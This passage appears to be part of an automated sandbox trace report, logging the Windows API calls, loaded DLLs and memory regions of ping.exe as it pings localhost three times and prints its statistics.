(in: lpszSrc="Reply from ::1: ", lpszDst=0x235120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0100.821] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.821] _write (in: _FileHandle=1, _Buf=0x235120*, _MaxCharCount=0x10 | out: _Buf=0x235120*) returned 16 [0100.822] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.822] LocalFree (hMem=0x235120) returned 0x0 [0100.822] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf8bc, nSize=0x0, Arguments=0xaf8b8 | out: lpBuffer="\x10<#") returned 0x9 [0100.822] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x233c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0100.822] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.822] _write (in: _FileHandle=1, _Buf=0x233c10*, _MaxCharCount=0x9 | out: _Buf=0x233c10*) returned 9 [0100.822] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.822] LocalFree (hMem=0x233c10) returned 0x0 [0100.822] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf8bc, nSize=0x0, Arguments=0xaf8b8 | out: lpBuffer=" \x8f#") returned 0x2 [0100.822] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x238f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0100.822] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.822] _write (in: _FileHandle=1, _Buf=0x238f20*, _MaxCharCount=0x2 | out: _Buf=0x238f20*) returned 2 [0100.822] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.822] LocalFree (hMem=0x238f20) returned 0x0 [0100.823] Sleep (dwMilliseconds=0x3e8) [0101.892] Icmp6SendEcho2 (in: IcmpHandle=0x238b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf930, DestinationAddress=0x1c55e0, RequestData=0x234830, RequestSize=0x20, RequestOptions=0xaf8e0, ReplyBuffer=0x23ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x23ebb0) returned 0x1 [0102.072] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, 
sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafdb4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0102.072] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf8b8, nSize=0x0, Arguments=0xaf8b4 | out: lpBuffer=" Q#") returned 0x10 [0102.072] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x235120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0102.072] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.072] _write (in: _FileHandle=1, _Buf=0x235120*, _MaxCharCount=0x10 | out: _Buf=0x235120*) returned 16 [0102.072] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.072] LocalFree (hMem=0x235120) returned 0x0 [0102.072] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf8bc, nSize=0x0, Arguments=0xaf8b8 | out: lpBuffer="\x10<#") returned 0x9 [0102.072] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x233c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0102.072] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.072] _write (in: _FileHandle=1, _Buf=0x233c10*, _MaxCharCount=0x9 | out: _Buf=0x233c10*) returned 9 [0102.072] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.072] LocalFree (hMem=0x233c10) returned 0x0 [0102.072] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf8bc, nSize=0x0, Arguments=0xaf8b8 | out: lpBuffer=" \x8f#") returned 0x2 [0102.072] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x238f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0102.072] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.072] _write (in: _FileHandle=1, _Buf=0x238f20*, _MaxCharCount=0x2 | out: _Buf=0x238f20*) returned 2 [0102.072] _setmode (_FileHandle=1, _Mode=16384) 
returned 32768 [0102.072] LocalFree (hMem=0x238f20) returned 0x0 [0102.072] Sleep (dwMilliseconds=0x3e8) [0103.167] Icmp6SendEcho2 (in: IcmpHandle=0x238b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf930, DestinationAddress=0x1c55e0, RequestData=0x234830, RequestSize=0x20, RequestOptions=0xaf8e0, ReplyBuffer=0x23ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x23ebb0) returned 0x1 [0103.329] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafdb4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0103.329] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf8b8, nSize=0x0, Arguments=0xaf8b4 | out: lpBuffer=" Q#") returned 0x10 [0103.329] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x235120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0103.329] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.329] _write (in: _FileHandle=1, _Buf=0x235120*, _MaxCharCount=0x10 | out: _Buf=0x235120*) returned 16 [0103.329] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.329] LocalFree (hMem=0x235120) returned 0x0 [0103.329] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf8bc, nSize=0x0, Arguments=0xaf8b8 | out: lpBuffer="\x10<#") returned 0x9 [0103.329] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x233c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0103.329] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.329] _write (in: _FileHandle=1, _Buf=0x233c10*, _MaxCharCount=0x9 | out: _Buf=0x233c10*) returned 9 [0103.329] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.329] LocalFree (hMem=0x233c10) returned 0x0 [0103.330] FormatMessageA (in: 
dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf8bc, nSize=0x0, Arguments=0xaf8b8 | out: lpBuffer=" \x8f#") returned 0x2 [0103.330] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x238f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0103.330] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.330] _write (in: _FileHandle=1, _Buf=0x238f20*, _MaxCharCount=0x2 | out: _Buf=0x238f20*) returned 2 [0103.330] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.330] LocalFree (hMem=0x238f20) returned 0x0 [0103.330] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xaf880, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0103.330] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xaf850, nSize=0x0, Arguments=0xaf84c | out: lpBuffer="\xd0\x14\x24") returned 0x56 [0103.330] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x2414d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0103.330] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.330] _write (in: _FileHandle=1, _Buf=0x2414d0*, _MaxCharCount=0x56 | out: _Buf=0x2414d0*) returned 86 [0103.330] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.330] LocalFree (hMem=0x2414d0) returned 0x0 [0103.330] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xaf860, nSize=0x0, Arguments=0xaf85c | out: lpBuffer="\xe8\x14\x24") returned 0x61 [0103.330] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", 
lpszDst=0x2414e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0103.330] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.330] _write (in: _FileHandle=1, _Buf=0x2414e8*, _MaxCharCount=0x61 | out: _Buf=0x2414e8*) returned 97 [0103.330] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.330] LocalFree (hMem=0x2414e8) returned 0x0 [0103.330] IcmpCloseHandle (IcmpHandle=0x238b40) returned 1 [0103.504] LocalFree (hMem=0x234830) returned 0x0 [0103.504] LocalFree (hMem=0x23ebb0) returned 0x0 [0103.504] WSACleanup () returned 0 [0103.600] exit (_Code=0) Thread: id = 41 os_tid = 0xc48 Thread: id = 42 os_tid = 0xc50 Thread: id = 43 os_tid = 0xc54 Process: id = "27" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16780" os_pid = "0xc38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0xbe8" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1796 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1797 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1798 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1799 start_va = 
0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1800 start_va = 0x1c0000 end_va = 0x1c7fff entry_point = 0x1c0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 1801 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1802 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1803 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1804 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1805 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1897 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1898 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1899 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1900 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1901 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1902 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1903 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1904 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1905 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1906 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1907 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1908 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1909 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1910 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = 
mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1911 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1912 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1913 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1914 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1915 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1916 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1917 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1918 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1919 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 
"c:\\windows\\system32\\msctf.dll") Region: id = 1920 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1921 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1922 start_va = 0xe0000 end_va = 0xe2fff entry_point = 0xe0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 1923 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1924 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1925 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1926 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1927 start_va = 0x1150000 end_va = 0x141efff entry_point = 0x1150000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1928 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1929 start_va = 0x1420000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 1930 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = 
"\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1931 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1932 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1933 start_va = 0x14c0000 end_va = 0x160ffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 1976 start_va = 0x1440000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 1977 start_va = 0x1480000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 1978 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1979 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2011 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2012 start_va = 0x170000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2057 start_va = 0x1610000 end_va = 0x164ffff entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 2058 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdc000" filename = "" Region: id = 2134 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2135 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 39 os_tid = 0xc3c [0100.855] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc54 | out: lpSystemTimeAsFileTime=0x16fc54*(dwLowDateTime=0x7a1ee9e0, dwHighDateTime=0x1d440a9)) [0100.855] GetCurrentProcessId () returned 0xc38 [0100.856] GetCurrentThreadId () returned 0xc3c [0100.856] GetTickCount () returned 0x24191 [0100.856] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc4c | out: lpPerformanceCount=0x16fc4c*=15764478321) returned 1 [0100.856] GetModuleHandleA (lpModuleName=0x0) returned 0x1c0000 [0100.856] __set_app_type (_Type=0x1) [0100.856] __p__fmode () returned 0x76b331f4 [0100.856] __p__commode () returned 0x76b331fc [0100.856] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1c2ae1) returned 0x0 [0100.856] __getmainargs (in: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8, _DoWildCard=0, _StartInfo=0x1c50e8 | out: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8) returned 0 [0100.856] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.857] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.857] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x1c5440 | out: lpWSAData=0x1c5440) returned 0 [0100.862] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x16f6e4 | out: phkResult=0x16f6e4*=0x58) returned 0x0 [0100.862] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x16f6d8, lpData=0x16f6e0, lpcbData=0x16f6dc*=0x4 | out: lpType=0x16f6d8*=0x0, lpData=0x16f6e0*=0x0, lpcbData=0x16f6dc*=0x4) returned 
0x2 [0100.862] RegCloseKey (hKey=0x58) returned 0x0 [0100.862] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x16f6ac*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x16f6d4 | out: ppResult=0x16f6d4*=0x0) returned 11001 [0100.862] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x16f6ac*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x16f6d4 | out: ppResult=0x16f6d4*=0x2946f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x2947b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2947e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x293a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0101.209] FreeAddrInfoW (pAddrInfo=0x2946f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x2947b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2947e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x293a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0101.209] Icmp6CreateFile () returned 0x298b40 [0101.385] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x294830 [0101.385] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x29ebb0 [0101.385] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x16fbd4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) 
returned 0 [0101.385] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x16f6d4, nSize=0x0, Arguments=0x16f6d0 | out: lpBuffer="XH)") returned 0x19 [0101.386] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x294858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0101.386] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.386] _write (in: _FileHandle=1, _Buf=0x294858*, _MaxCharCount=0x19 | out: _Buf=0x294858*) returned 25 [0101.386] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.386] LocalFree (hMem=0x294858) returned 0x0 [0101.386] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x16f6d8, nSize=0x0, Arguments=0x16f6d4 | out: lpBuffer="XH)") returned 0x18 [0101.386] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x294858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0101.386] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.386] _write (in: _FileHandle=1, _Buf=0x294858*, _MaxCharCount=0x18 | out: _Buf=0x294858*) returned 24 [0101.386] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.386] LocalFree (hMem=0x294858) returned 0x0 [0101.386] SetConsoleCtrlHandler (HandlerRoutine=0x1c17ca, Add=1) returned 1 [0101.386] Icmp6SendEcho2 (in: IcmpHandle=0x298b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x16f750, DestinationAddress=0x1c55e0, RequestData=0x294830, RequestSize=0x20, RequestOptions=0x16f700, ReplyBuffer=0x29ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x29ebb0) returned 0x1 [0101.394] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x16fbd4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 
0 [0101.394] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x16f6d8, nSize=0x0, Arguments=0x16f6d4 | out: lpBuffer=" Q)") returned 0x10 [0101.394] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x295120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0101.394] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.394] _write (in: _FileHandle=1, _Buf=0x295120*, _MaxCharCount=0x10 | out: _Buf=0x295120*) returned 16 [0101.395] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.395] LocalFree (hMem=0x295120) returned 0x0 [0101.395] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0x16f6d8, nSize=0x0, Arguments=0x16f6d4 | out: lpBuffer="\x10<)") returned 0x9 [0101.395] CharToOemBuffA (in: lpszSrc="time=6ms ", lpszDst=0x293c10, cchDstLength=0x9 | out: lpszDst="time=6ms ") returned 1 [0101.395] _setmode 